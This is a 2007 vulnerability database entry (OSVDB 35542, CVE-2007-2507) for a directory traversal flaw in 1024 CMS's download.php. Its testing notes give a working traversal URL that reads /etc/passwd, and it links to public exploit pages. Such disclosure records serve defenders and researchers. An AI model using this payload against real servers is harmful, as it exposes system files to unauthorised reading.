1024 CMS includes/download.php item Variable Traversal Arbitrary File Access

2007-05-02T08:33:56
ID OSVDB:35542
Type osvdb
Reporter OSVDB
Modified 2007-05-02T08:33:56

Description

Manual Testing Notes

http://[target]/1024/includes/download.php?item=../uploads/../../../../../etc/passwd

References:

Secunia Advisory ID:25120 Other Advisory URL: http://0day.2600.ir/exploits/3832 Mail List Post: http://www.attrition.org/pipermail/vim/2007-May/001578.html ISS X-Force ID: 34004 Generic Exploit URL: http://www.milw0rm.com/exploits/3832 FrSIRT Advisory: ADV-2007-1630 CVE-2007-2507 Bugtraq ID: 23774